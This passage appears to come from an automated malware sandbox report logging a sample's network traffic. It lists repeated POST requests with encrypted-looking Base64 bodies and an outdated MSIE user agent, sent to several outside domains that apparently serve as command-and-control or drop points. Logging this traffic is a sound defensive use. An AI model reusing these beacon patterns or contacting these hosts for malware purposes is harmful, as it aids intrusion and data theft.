46 6e 33 55 75 44 33 42 41 54 51 44 52 2f 74 69 78 6c 44 46 76 53 64 49 6b 50 52 67 6b 6b 59 49 4b 64 57 6c 46 65 5a 56 74 6e 44 36 34 68 69 6b 42 65 73 56 51 2b 6e 64 4d 66 42 74 70 5a 55 61 36 4a 39 62 70 30 4b 73 71 70 4a 31 75 39 70 42 37 45 66 73 71 55 62 2f 78 42 42 4b 2f 50 67 54 6c 53 54 6a 73 4f 47 45 4f 42 55 75 2b 34 34 47 47 4c 70 4b 41 70 43 49 43 69 35 70 6a 4c 68 65 4c 78 6b 54 45 4e 72 53 65 79 6f 67 35 68 41 75 48 46 42 49 51 71 44 57 35 59 2b 63 6e 36 66 74 2f 30 59 2b 56 6c 38 78 4d 54 55 4a 31 31 41 4a 66 67 79 36 35 2b 2b 52 4f 38 61 37 71 6c 76 4f 6d 77 54 44 2f 44 53 72 52 44 41 65 6e 4b 63 39 53 4d 58 64 2f 2b 58 75 34 35 6a 33 6d 54 73 75 4a 59 4d 6a 43 67 66 70 41 4f 6b 44 49 4c 56 66 4d 4f 79 6c 6d 41 31 75 6b 47 42 75 2b 46 70 56 70 75 76 33 36 47 48 35 38 32 6f 45 38 79 39 4b 57 6f 62 7a 46 6e 34 64 57 4c 67 4f 58 55 59 64 4b 35 66 4c 4a 55 4f 4f 4e 30 66 74 4a 38 72 59 79 43 6c 63 61 4f 7a 75 74 2b 41 48 56 2f 2f 43 47 37 41 2b 62 33 5a 6f 70 31 68 52 37 70 79 4a 70 6d 54 50 6a 6a 31 74 42 76 66 39 69 32 50 6a 62 64 73 5a 6b 6a 63 6a 71 34 71 58 63 43 58 52 4a 45 78 50 77 3d 3d Data Ascii: eSaMOWkZhIZ5vkImOBOFLoKpnosHs55LrdJawpFG0JfU7mbpcCJjTbyIm1clo/DBORJcltbARLHOexhCJ7cvSb57m0kSLdLAlSCEFUoD22TQxq9K3NMv1OpObEwVUDcOQbgYRuCLG5MdQJ5Xs7OFp6xvCE4NECFAiFozNI6hLAdAfQydFE3bUiFR+fAaOFlDpRl678xy89GjaMddasGwFEAoYFn3UuD3BATQDR/tixlDFvSdIkPRgkkYIKdWlFeZVtnD64hikBesVQ+ndMfBtpZUa6J9bp0KsqpJ1u9pB7EfsqUb/xBBK/PgTlSTjsOGEOBUu+44GGLpKApCICi5pjLheLxkTENrSeyog5hAuHFBIQqDW5Y+cn6ft/0Y+Vl8xMTUJ11AJfgy65++RO8a7qlvOmwTD/DSrRDAenKc9SMXd/+Xu45j3mTsuJYMjCgfpAOkDILVfMOylmA1ukGBu+FpVpuv36GH582oE8y9KWobzFn4dWLgOXUYdK5fLJUOON0ftJ8rYyClcaOzut+AHV//CG7A+b3Zop1hR7pyJpmTPjj1tBvf9i2PjbdsZkjcjq4qXcCXRJExPw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 50 32 39 52 6c 78 54 4e 6f 59 65 31 79 2f 4e 62 37 31 56 51 6e 6d 65 35 4d 35 2b 4d 63 37 41 37 69 43 4d 66 49 4c 76 71 50 50 58 41 69 65 31 45 6f 5a 73 63 68 47 66 6b 51 52 6a 55 45 77 44 59 43 39 42 54 49 73 77 2f 43 66 56 61 70 55 73 56 4a 56 35 51 73 4f 77 64 7a 73 6f 33 69 74 51 39 50 62 57 39 36 56 6d 50 7a 33 45 68 79 79 31 61 35 59 45 4e 45 57 51 63 54 4d 71 7a 6e 70 74 78 56 4a 54 61 4f 6f 39 53 67 6c 48 2b 67 70 70 32 67 4a 6c 44 6e 52 56 59 61 43 58 79 39 72 5a 72 45 47 47 48 70 6c 4e 58 38 74 7a 53 52 46 4f 54 33 6d 38 62 64 31 33 73 4b 6d 42 6d 74 59 4f 31 4c 37 67 51 39 61 2f 63 64 59 65 52 4a 76 31 4f 6b 48 38 67 33 44 4b 6c 78 4b 4d 44 69 35 77 69 68 6f 2f 42 31 4d 54 79 36 37 75 6a 4c 44 4b 68 36 39 45 56 4b 6f 6a 44 78 43 45 47 64 42 65 41 72 6e 64 61 64 73 68 34 6c 34 62 36 57 57 4d 57 43 70 6e 52 50 50 75 6e 67 66 32 6e 48 47 6b 2b 58 6e 31 6a 47 72 62 49 30 46 59 4f 32 6c 73 46 48 77 47 78 61 30 30 43 37 51 4b 48 38 33 33 69 72 41 48 48 4c 36 54 69 51 62 49 32 43 74 56 56 63 36 6a 42 2f 49 32 53 4b 4c 73 68 52 36 6b 33 49 54 73 6a 79 4b 73 65 46 55 50 65 75 71 6d 6a 4d 77 5a 4d 49 30 33 79 5a 70 73 4d 36 38 2f 70 56 50 58 37 63 46 76 4f 4f 51 43 4d 37 34 30 67 42 6a 46 61 4f 44 77 56 76 66 65 69 76 30 6d 6f 34 65 65 48 51 4f 50 6d 65 76 42 2b 4a 6a 6c 36 58 55 61 74 71 51 78 47 6a 62 65 56 59 42 6b 4e 6e 47 31 33 75 4a 77 5a 56 54 7a 5a 47 6a 7a 6b 31 71 75 70 56 30 31 42 4e 70 63 55 64 77 69 62 30 6b 48 35 7a 5a 6c 73 4f 73 6d 4e 44 63 49 56 62 4b 37 63 68 65 70 56 75 63 5a 72 49 37 6a 66 64 4d 7a 76 6f 34 34 79 6f 5a 79 44 68 79 4f 34 39 31 76 58 62 4d 45 32 54 6a 73 32 68 78 53 69 35 49 61 4f 61 49 71 32 6a 74 68 67 51 42 70 71 6b 42 56 36 35 73 76 32 37 7a 38 3d Data Ascii: P29RlxTNoYe1y/Nb71VQnme5M5+Mc7A7iCMfILvqPPXAie1EoZschGfkQRjUEwDYC9BTIsw/CfVapUsVJV5QsOwdzso3itQ9PbW96VmPz3Ehyy1a5YENEWQcTMqznptxVJTaOo9SglH+gpp2gJlDnRVYaCXy9rZrEGGHplNX8tzSRFOT3m8bd13sKmBmtYO1L7gQ9a/cdYeRJv1OkH8g3DKlxKMDi5wiho/B1MTy67ujLDKh69EVKojDxCEGdBeArndadsh4l4b6WWMWCpnRPPungf2nHGk+Xn1jGrbI0FYO2lsFHwGxa00C7QKH833irAHHL6TiQbI2CtVVc6jB/I2SKLshR6k3ITsjyKseFUPeuqmjMwZMI03yZpsM68/pVPX7cFvOOQCM740gBjFaODwVvfeiv0mo4eeHQOPmevB+Jjl6XUatqQxGjbeVYBkNnG13uJwZVTzZGjzk1qupV01BNpcUdwib0kH5zZlsOsmNDcIVbK7chepVucZrI7jfdMzvo44yoZyDhyO491vXbME2Tjs2hxSi5IaOaIq2jthgQBpqkBV65sv27z8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 50 32 39 52 6c 78 54 4e 6f 59 65 31 79 2f 4e 62 37 31 56 51 6e 6d 65 35 4d 35 2b 4d 63 37 41 37 69 43 4d 66 49 4c 76 71 50 50 58 41 69 65 31 45 6f 5a 73 63 68 47 66 6b 51 52 6a 55 45 77 44 59 43 39 42 54 49 73 77 2f 43 66 56 61 70 55 73 56 4a 56 35 51 73 4f 77 64 7a 73 6f 33 69 74 51 39 50 62 57 39 36 56 6d 50 7a 33 45 68 79 79 31 61 35 59 45 4e 45 57 51 63 54 4d 71 7a 6e 70 74 78 56 4a 54 61 4f 6f 39 53 67 6c 48 2b 67 70 70 32 67 4a 6c 44 6e 52 56 59 61 43 58 79 39 72 5a 72 45 47 47 48 70 6c 4e 58 38 74 7a 53 52 46 4f 54 33 6d 38 62 64 31 33 73 4b 6d 42 6d 74 59 4f 31 4c 37 67 51 39 61 2f 63 64 59 65 52 4a 76 31 4f 6b 48 38 67 33 44 4b 6c 78 4b 4d 44 69 35 77 69 68 6f 2f 42 31 4d 54 79 36 37 75 6a 4c 44 4b 68 36 39 45 56 4b 6f 6a 44 78 43 45 47 64 42 65 41 72 6e 64 61 64 73 68 34 6c 34 62 36 57 57 4d 57 43 70 6e 52 50 50 75 6e 67 66 32 6e 48 47 6b 2b 58 6e 31 6a 47 72 62 49 30 46 59 4f 32 6c 73 46 48 77 47 78 61 30 30 43 37 51 4b 48 38 33 33 69 72 41 48 48 4c 36 54 69 51 62 49 32 43 74 56 56 63 36 6a 42 2f 49 32 53 4b 4c 73 68 52 36 6b 33 49 54 73 6a 79 4b 73 65 46 55 50 65 75 71 6d 6a 4d 77 5a 4d 49 30 33 79 5a 70 73 4d 36 38 2f 70 56 50 58 37 63 46 76 4f 4f 51 43 4d 37 34 30 67 42 6a 46 61 4f 44 77 56 76 66 65 69 76 30 6d 6f 34 65 65 48 51 4f 50 6d 65 76 42 2b 4a 6a 6c 36 58 55 61 74 71 51 78 47 6a 62 65 56 59 42 6b 4e 6e 47 31 33 75 4a 77 5a 56 54 7a 5a 47 6a 7a 6b 31 71 75 70 56 30 31 42 4e 70 63 55 64 77 69 62 30 6b 48 35 7a 5a 6c 73 4f 73 6d 4e 44 63 49 56 62 4b 37 63 68 65 70 56 75 63 5a 72 49 37 6a 66 64 4d 7a 76 6f 34 34 79 6f 5a 79 44 68 79 4f 34 39 31 76 58 62 4d 45 32 54 6a 73 32 68 78 53 69 35 49 61 4f 61 49 71 32 6a 74 68 67 51 42 70 71 6b 42 56 36 35 73 76 32 37 7a 38 3d Data Ascii: P29RlxTNoYe1y/Nb71VQnme5M5+Mc7A7iCMfILvqPPXAie1EoZschGfkQRjUEwDYC9BTIsw/CfVapUsVJV5QsOwdzso3itQ9PbW96VmPz3Ehyy1a5YENEWQcTMqznptxVJTaOo9SglH+gpp2gJlDnRVYaCXy9rZrEGGHplNX8tzSRFOT3m8bd13sKmBmtYO1L7gQ9a/cdYeRJv1OkH8g3DKlxKMDi5wiho/B1MTy67ujLDKh69EVKojDxCEGdBeArndadsh4l4b6WWMWCpnRPPungf2nHGk+Xn1jGrbI0FYO2lsFHwGxa00C7QKH833irAHHL6TiQbI2CtVVc6jB/I2SKLshR6k3ITsjyKseFUPeuqmjMwZMI03yZpsM68/pVPX7cFvOOQCM740gBjFaODwVvfeiv0mo4eeHQOPmevB+Jjl6XUatqQxGjbeVYBkNnG13uJwZVTzZGjzk1qupV01BNpcUdwib0kH5zZlsOsmNDcIVbK7chepVucZrI7jfdMzvo44yoZyDhyO491vXbME2Tjs2hxSi5IaOaIq2jthgQBpqkBV65sv27z8=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 43 75 47 44 79 41 71 6e 78 49 66 48 47 53 32 53 62 57 72 7a 79 38 30 45 57 67 53 36 2b 36 4c 39 33 6c 48 50 55 62 74 4f 76 6a 7a 47 45 55 33 6d 56 73 61 71 34 36 51 45 53 74 33 56 67 44 76 7a 4d 69 31 30 5a 30 6a 66 4a 4f 30 4d 52 50 37 77 45 66 57 44 70 44 51 54 63 6e 30 47 47 79 74 71 30 4d 44 39 48 38 66 44 4c 63 5a 42 70 33 2f 6b 50 2f 64 70 44 51 4c 53 70 6e 75 53 38 6d 56 51 57 55 37 72 58 31 61 70 53 75 2f 61 35 4c 78 76 55 78 70 68 42 39 79 53 41 58 62 46 71 66 49 47 38 72 75 74 2b 46 37 54 52 68 32 62 64 70 2b 48 4f 56 72 45 67 43 38 4f 65 48 68 58 6d 45 31 61 56 33 4c 38 78 74 76 5a 62 52 45 4f 45 4e 49 66 6f 48 43 4c 77 73 58 6a 32 44 79 59 59 36 4b 30 6f 69 44 64 56 30 68 38 33 44 32 33 4b 61 7a 35 56 2f 7a 48 4d 48 6e 30 7a 30 46 70 68 45 30 58 52 37 78 6a 4e 64 57 48 58 2f 72 73 39 45 4e 46 32 59 2b 74 64 79 66 64 49 37 6b 36 38 54 64 6a 46 65 67 66 56 2b 31 2f 2b 61 32 32 39 73 6b 4d 45 76 32 65 32 75 57 4d 31 4e 5a 4b 46 54 33 6e 30 36 4d 32 58 78 31 7a 72 4f 4b 74 56 45 67 4d 42 42 53 6d 71 70 52 44 6d 68 52 6a 67 4c 7a 51 5a 31 50 47 5a 54 49 41 33 36 54 4c 64 5a 49 4a 65 4f 61 66 2b 52 6b 65 75 4a 4a 6e 54 79 56 6e 34 2b 4d 48 31 38 54 2b 5a 41 79 4b 34 69 30 62 4c 4d 56 4d 51 75 37 4e 4a 73 62 59 39 46 32 77 52 53 66 78 45 30 68 55 2f 45 2b 2f 31 66 68 71 6b 66 2b 49 48 54 43 53 61 32 44 2b 30 52 2f 64 4c 41 43 31 66 57 56 2b 74 37 49 30 54 75 4a 4e 32 6b 39 51 46 45 78 72 6d 4c 7a 41 67 78 63 72 64 6f 2b 43 6c 45 55 30 74 2f 74 32 45 61 34 37 73 6e 50 2b 59 5a 6c 39 6f 57 57 41 57 71 54 4d 59 42 72 62 68 32 6f 38 4e 4c 51 4e 55 35 39 79 45 4e 61 39 74 4f 4f 45 50 4c 62 78 71 7a 68 36 4e 47 39 62 6a 73 69 51 36 4f 54 47 41 6a 75 47 75 5a 66 7a 49 73 46 35 48 73 54 39 34 57 34 53 4f 30 64 69 65 44 2f 73 4d 5a 70 70 6b 79 6a 4a 6a 6b 74 32 4b 6c 6b 68 55 51 3d 3d Data Ascii: CuGDyAqnxIfHGS2SbWrzy80EWgS6+6L93lHPUbtOvjzGEU3mVsaq46QESt3VgDvzMi10Z0jfJO0MRP7wEfWDpDQTcn0GGytq0MD9H8fDLcZBp3/kP/dpDQLSpnuS8mVQWU7rX1apSu/a5LxvUxphB9ySAXbFqfIG8rut+F7TRh2bdp+HOVrEgC8OeHhXmE1aV3L8xtvZbREOENIfoHCLwsXj2DyYY6K0oiDdV0h83D23Kaz5V/zHMHn0z0FphE0XR7xjNdWHX/rs9ENF2Y+tdyfdI7k68TdjFegfV+1/+a229skMEv2e2uWM1NZKFT3n06M2Xx1zrOKtVEgMBBSmqpRDmhRjgLzQZ1PGZTIA36TLdZIJeOaf+RkeuJJnTyVn4+MH18T+ZAyK4i0bLMVMQu7NJsbY9F2wRSfxE0hU/E+/1fhqkf+IHTCSa2D+0R/dLAC1fWV+t7I0TuJN2k9QFExrmLzAgxcrdo+ClEU0t/t2Ea47snP+YZl9oWWAWqTMYBrbh2o8NLQNU59yENa9tOOEPLbxqzh6NG9bjsiQ6OTGAjuGuZfzIsF5HsT94W4SO0dieD/sMZppkyjJjkt2KlkhUQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 53 51 6e 79 64 6d 78 67 73 59 64 52 64 74 59 42 56 2b 42 6e 4e 33 2b 69 72 32 58 45 4a 5a 6f 4d 59 4d 42 2b 38 37 34 70 73 6a 56 78 70 41 52 65 6b 65 50 51 66 44 7a 4e 31 71 70 49 70 33 32 46 53 75 64 34 63 66 34 63 65 43 6c 48 44 35 59 42 37 67 57 72 53 31 48 46 6c 47 56 64 64 42 57 6d 6f 76 70 62 38 77 78 77 4c 48 44 4f 6d 69 36 76 36 67 44 7a 4e 38 4c 36 4d 30 59 74 59 56 6a 45 73 2b 6c 4f 4c 37 37 42 4c 79 79 55 36 54 4b 42 34 53 45 6f 71 48 4e 42 38 42 57 71 78 6d 4d 44 6c 43 32 4f 32 76 30 78 30 70 4e 47 6c 72 73 4a 37 4d 6f 75 31 48 58 52 33 78 46 71 2b 58 7a 41 31 48 66 55 65 35 30 73 37 53 42 76 67 66 61 63 56 58 39 46 44 30 50 32 51 65 6b 47 67 56 5a 63 4c 38 67 68 68 4f 62 38 73 41 62 42 7a 45 72 59 73 4d 49 47 64 66 58 59 6e 31 53 50 2b 59 6d 31 63 47 45 4e 68 4d 52 56 70 55 6b 31 66 36 35 31 2f 71 50 6e 75 61 32 69 56 6f 55 67 63 4a 33 6f 4e 4f 73 63 67 70 7a 55 64 32 57 6d 51 70 2b 39 59 55 4b 2f 4f 6d 6c 70 79 2b 57 74 33 52 38 63 37 53 4e 63 68 6f 32 56 4f 37 4c 4b 56 75 55 78 38 4f 68 5a 75 44 65 36 6a 46 72 49 73 6b 66 67 33 50 48 61 61 61 32 39 65 67 6a 46 42 4b 46 41 61 35 51 50 6a 75 71 69 4d 35 63 66 4a 4e 71 53 58 4c 43 54 56 48 49 4f 6a 5a 73 4b 48 49 67 49 70 2b 30 59 63 51 55 4f 36 65 65 37 39 6a 73 2f 4b 6c 55 61 54 73 72 6b 6c 62 66 78 4f 77 6d 64 6f 61 43 35 7a 67 61 37 2f 35 41 79 4e 76 62 2b 38 35 6f 4a 70 69 6b 6d 73 77 4e 35 53 4f 6b 6a 4b 4e 65 45 5a 59 72 68 74 49 4a 4b 38 76 45 79 5a 63 69 51 61 49 65 65 2f 44 4a 71 56 54 54 50 6b 46 58 67 72 63 49 71 6b 34 46 6b 38 7a 78 44 58 56 64 6a 61 42 55 61 4a 34 41 61 74 67 6b 78 50 47 56 6b 2f 74 79 68 72 61 64 2f 70 65 53 41 4a 69 36 52 42 77 53 34 5a 5a 45 56 68 35 55 6b 37 79 62 68 6b 55 57 67 35 72 6c 4c 4e 68 56 32 79 6e 45 7a 54 45 73 58 4c 63 33 2f 61 72 65 76 68 65 41 3d Data Ascii: SQnydmxgsYdRdtYBV+BnN3+ir2XEJZoMYMB+874psjVxpARekePQfDzN1qpIp32FSud4cf4ceClHD5YB7gWrS1HFlGVddBWmovpb8wxwLHDOmi6v6gDzN8L6M0YtYVjEs+lOL77BLyyU6TKB4SEoqHNB8BWqxmMDlC2O2v0x0pNGlrsJ7Mou1HXR3xFq+XzA1HfUe50s7SBvgfacVX9FD0P2QekGgVZcL8ghhOb8sAbBzErYsMIGdfXYn1SP+Ym1cGENhMRVpUk1f651/qPnua2iVoUgcJ3oNOscgpzUd2WmQp+9YUK/Omlpy+Wt3R8c7SNcho2VO7LKVuUx8OhZuDe6jFrIskfg3PHaaa29egjFBKFAa5QPjuqiM5cfJNqSXLCTVHIOjZsKHIgIp+0YcQUO6ee79js/KlUaTsrklbfxOwmdoaC5zga7/5AyNvb+85oJpikmswN5SOkjKNeEZYrhtIJK8vEyZciQaIee/DJqVTTPkFXgrcIqk4Fk8zxDXVdjaBUaJ4AatgkxPGVk/tyhrad/peSAJi6RBwS4ZZEVh5Uk7ybhkUWg5rlLNhV2ynEzTEsXLc3/arevheA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 65 67 6e 44 6d 52 41 54 33 49 63 77 71 65 35 55 6f 30 76 45 72 73 4e 38 38 71 6b 34 78 7a 4c 64 52 43 74 6a 78 6e 6d 2b 35 6b 45 6f 4d 7a 38 51 49 4d 4c 6f 46 70 6a 78 70 58 4d 37 59 43 2b 48 63 39 32 7a 64 31 46 56 75 54 42 4a 6f 47 55 2f 2f 46 32 46 6d 72 35 79 48 46 4d 53 36 55 56 68 4f 49 48 68 44 30 34 68 41 42 67 4f 2b 75 73 61 71 70 6c 64 37 31 6d 69 58 6b 4b 61 6c 65 6f 32 66 61 37 5a 4a 50 64 5a 63 57 41 4d 35 33 5a 38 47 62 54 65 45 5a 33 73 2f 46 37 71 57 50 32 30 79 47 35 66 43 42 35 64 52 7a 47 54 43 48 71 70 4f 43 2f 2b 4b 37 5a 4b 6e 35 6e 75 37 42 58 55 6c 75 37 4d 4c 6c 52 70 48 76 42 42 34 61 30 4f 43 4f 61 48 30 70 54 76 4d 35 39 57 49 46 53 5a 6c 75 46 39 42 36 72 79 68 57 42 43 34 7a 2f 77 68 63 7a 6f 51 75 69 69 37 44 41 2f 43 6b 59 75 47 63 2b 4c 43 74 66 69 72 69 64 37 62 49 4c 46 75 45 4a 4a 66 61 52 4e 32 37 46 65 57 76 77 73 6c 77 69 56 66 59 45 54 42 66 39 42 51 74 4b 62 76 4f 6b 37 4b 6d 62 6c 53 67 6d 45 7a 61 4d 73 55 71 48 62 30 53 39 74 6f 56 32 4b 5a 71 64 72 44 77 69 49 6b 46 59 4a 74 46 7a 6e 76 61 4c 4f 64 2f 67 39 36 6a 51 50 76 4e 59 77 7a 50 72 65 68 32 4e 48 6a 6c 55 30 67 43 6d 64 4e 39 4b 54 35 54 57 66 35 7a 58 58 4f 6c 36 70 6b 54 48 6f 74 4a 36 6f 6f 61 51 68 70 54 45 2b 55 64 70 5a 41 31 6a 67 76 4a 73 6f 58 46 67 71 59 64 71 79 39 61 75 4d 51 49 42 35 64 63 6d 6e 63 37 4b 63 71 58 51 70 49 71 2f 45 4d 62 38 73 4f 49 62 51 66 6a 2f 2f 42 7a 77 6b 64 73 6c 4b 37 55 47 38 38 64 6e 39 4c 41 78 47 48 4b 52 75 6f 70 78 75 30 44 31 36 4e 55 69 65 5a 65 2f 57 68 46 6d 31 4e 52 57 6f 48 49 4b 31 35 74 53 44 4c 72 37 2f 2b 32 46 6a 6a 2b 6b 6d 57 49 69 7a 62 55 58 30 79 67 3d 3d Data Ascii: egnDmRAT3Icwqe5Uo0vErsN88qk4xzLdRCtjxnm+5kEoMz8QIMLoFpjxpXM7YC+Hc92zd1FVuTBJoGU//F2Fmr5yHFMS6UVhOIHhD04hABgO+usaqpld71miXkKaleo2fa7ZJPdZcWAM53Z8GbTeEZ3s/F7qWP20yG5fCB5dRzGTCHqpOC/+K7ZKn5nu7BXUlu7MLlRpHvBB4a0OCOaH0pTvM59WIFSZluF9B6ryhWBC4z/whczoQuii7DA/CkYuGc+LCtfirid7bILFuEJJfaRN27FeWvwslwiVfYETBf9BQtKbvOk7KmblSgmEzaMsUqHb0S9toV2KZqdrDwiIkFYJtFznvaLOd/g96jQPvNYwzPreh2NHjlU0gCmdN9KT5TWf5zXXOl6pkTHotJ6ooaQhpTE+UdpZA1jgvJsoXFgqYdqy9auMQIB5dcmnc7KcqXQpIq/EMb8sOIbQfj//BzwkdslK7UG88dn9LAxGHKRuopxu0D16NUieZe/WhFm1NRWoHIK15tSDLr7/+2Fjj+kmWIizbUX0yg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheData Raw: 67 7a 4e 56 47 41 7a 66 31 34 63 5a 43 75 34 35 64 77 35 77 37 52 2b 36 6d 6d 66 6b 4b 4a 51 66 41 4e 6b 75 50 32 61 4a 71 45 67 45 6f 47 35 77 64 61 7a 2b 58 44 56 6c 33 31 5a 30 4a 76 63 61 6c 4e 68 4b 7a 61 2f 48 76 77 53 2b 76 78 73 30 46 38 45 65 33 37 6e 34 58 31 4d 6b 6e 43 48 78 79 6e 74 68 4b 61 5a 72 42 6c 2b 78 49 45 71 48 68 6c 66 4a 4e 6c 70 73 78 4e 37 76 43 76 71 42 4e 35 48 41 57 7a 71 4b 65 4f 77 61 31 55 63 2f 46 71 49 56 58 74 4c 53 44 6f 44 59 63 46 59 30 48 5a 65 55 79 30 4a 2b 55 7a 61 33 54 34 4f 79 62 70 39 6e 4c 67 49 44 6b 41 34 6e 37 75 51 34 62 2f 54 6d 38 72 69 38 4d 63 78 4e 51 73 6d 43 5a 36 71 78 4b 64 39 67 6f 42 79 63 46 67 7a 71 70 74 41 55 73 33 33 6c 6f 6d 53 55 7a 51 73 39 2b 6a 49 4e 35 63 6c 62 53 33 47 70 62 4d 57 63 6d 49 52 70 69 47 72 35 45 30 76 47 4e 6e 58 78 73 33 7a 76 4d 58 52 31 4c 76 4d 6e 38 79 69 4d 72 48 45 49 75 45 65 38 66 30 58 37 49 4a 56 44 32 56 54 54 30 78 39 47 36 65 53 73 44 79 30 61 45 62 43 48 59 64 2b 74 36 64 6c 50 4e 75 50 73 4e 6c 78 50 65 4d 66 72 4a 74 69 6a 6f 71 57 35 44 41 4d 46 67 49 76 55 52 6d 4b 51 78 31 53 68 33 4d 31 67 30 51 4c 72 42 71 44 66 35 6f 45 4e 75 45 55 36 37 50 63 79 64 37 7a 47 68 77 59 75 62 6d 66 58 36 49 4d 68 42 62 4a 4d 58 47 69 76 56 72 75 75 34 51 34 65 4e 74 51 4d 57 48 58 71 4b 32 2b 66 68 6f 4c 6a 4d 4c 33 45 71 44 77 36 4a 6a 6b 6a 4f 2b 35 45 31 30 62 35 53 38 4e 32 72 61 34 57 78 34 59 57 75 73 42 4c 31 35 41 61 38 50 67 41 52 6c 62 39 44 47 54 32 41 78 34 53 63 43 39 79 4f 73 38 7a 6f 50 49 38 39 36 49 44 2b 69 58 57 59 71 78 39 64 65 6e 7a 42 37 73 4e 54 49 39 72 64 78 72 46 44 71 33 4f 66 68 47 6e 74 6e 42 51 4e 51 62 63 46 76 37 34 34 2b 4d 4b 72 7a 73 52 51 58 48 57 77 49 68 68 45 46 44 32 54 69 75 56 65 39 64 43 31 54 4a 59 63 48 69 50 6a 58 69 4e 6f 38 2b 6e 46 72 55 3d Data Ascii: gzNVGAzf14cZCu45dw5w7R+6mmfkKJQfANkuP2aJqEgEoG5wdaz+XDVl31Z0JvcalNhKza/HvwS+vxs0F8Ee37n4X1MknCHxynthKaZrBl+xIEqHhlfJNlpsxN7vCvqBN5HAWzqKeOwa1Uc/FqIVXtLSDoDYcFY0HZeUy0J+Uza3T4Oybp9nLgIDkA4n7uQ4b/Tm8ri8McxNQsmCZ6qxKd9goBycFgzqptAUs33lomSUzQs9+jIN5clbS3GpbMWcmIRpiGr5E0vGNnXxs3zvMXR1LvMn8yiMrHEIuEe8f0X7IJVD2VTT0x9G6eSsDy0aEbCHYd+t6dlPNuPsNlxPeMfrJtijoqW5DAMFgIvURmKQx1Sh3M1g0QLrBqDf5oENuEU67Pcyd7zGhwYubmfX6IMhBbJMXGivVruu4Q4eNtQMWHXqK2+fhoLjML3EqDw6JjkjO+5E10b5S8N2ra4Wx4YWusBL15Aa8PgARlb9DGT2Ax4ScC9yOs8zoPI896ID+iXWYqx9denzB7sNTI9rdxrFDq3OfhGntnBQNQbcFv744+MKrzsRQXHWwIhhEFD2TiuVe9dC1TJYcHiPjXiNo8+nFrU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 66 6f 4a 71 55 64 73 4a 34 6f 63 71 47 52 68 53 38 72 55 35 4b 63 52 63 2b 77 74 68 4b 54 4a 42 50 79 46 6f 39 4f 66 5a 65 4f 74 6d 6f 38 58 6e 4b 50 53 71 70 63 7a 78 4f 65 4c 79 4f 6f 4a 42 59 33 56 69 64 71 64 71 76 78 79 55 42 67 4c 79 6d 74 79 53 43 4e 70 39 59 4d 75 39 6e 70 44 4d 42 43 76 5a 63 46 77 72 71 30 38 61 48 30 4d 68 2f 34 63 6d 6b 64 48 73 63 41 2f 32 56 67 6d 48 50 4a 63 30 4e 6c 4b 4d 6d 50 38 47 45 52 49 30 4a 50 44 30 49 54 53 50 4c 7a 6c 72 74 30 4b 73 4f 63 76 63 6f 42 55 44 56 75 6c 55 61 53 38 4b 4c 56 6a 7a 6c 78 51 4b 37 4d 34 2b 4f 6c 74 49 68 53 67 5a 49 58 74 4c 4b 53 51 74 69 51 73 34 6b 72 66 6d 39 70 31 78 72 43 73 53 4d 4c 4b 52 75 63 6b 39 4b 4e 71 4e 53 6d 63 41 70 2b 72 43 2f 6b 38 4f 7a 6d 62 6d 46 42 47 55 51 71 6f 61 4d 6d 53 33 77 4b 42 6f 54 42 42 54 66 51 6f 71 36 33 79 45 64 77 53 4e 53 2f 62 51 54 79 2f 52 63 56 30 63 2b 79 42 51 53 72 44 5a 71 6f 5a 53 78 45 41 4e 6c 30 76 31 59 4e 36 52 45 4a 4e 46 70 75 53 37 79 59 31 42 46 2b 4f 2b 37 4c 36 59 55 44 32 37 78 47 57 64 49 31 42 6f 4c 63 78 5a 69 51 55 63 4c 6b 53 30 62 4f 54 68 37 39 74 4e 70 37 77 4b 48 4b 56 45 66 63 66 4e 56 4f 63 43 52 77 42 55 33 77 75 52 64 52 33 4b 71 72 68 55 49 6a 57 6c 69 35 56 4e 57 75 33 54 6b 69 67 4b 7a 6d 72 53 35 30 4a 55 61 59 2b 67 67 32 2b 4f 79 4d 41 66 48 76 7a 6c 51 2f 6b 71 4a 57 67 7a 61 68 4f 47 66 50 4e 64 43 45 63 55 56 67 38 56 6e 51 4b 7a 36 70 79 30 41 51 4b 41 54 6c 6f 53 32 4d 70 42 67 66 58 68 33 50 5a 69 43 71 2f 62 34 7a 49 61 4b 54 48 67 47 4a 4a 62 6c 77 4c 71 76 65 33 76 2f 70 34 65 43 75 6f 2b 30 6d 7a 46 58 61 76 50 56 74 57 63 41 4f 45 37 4c 33 73 61 47 39 58 31 64 44 50 4b 4a 73 34 47 57 45 35 43 43 72 4e 68 72 63 54 45 46 31 39 32 5a 77 3d 3d Data Ascii: 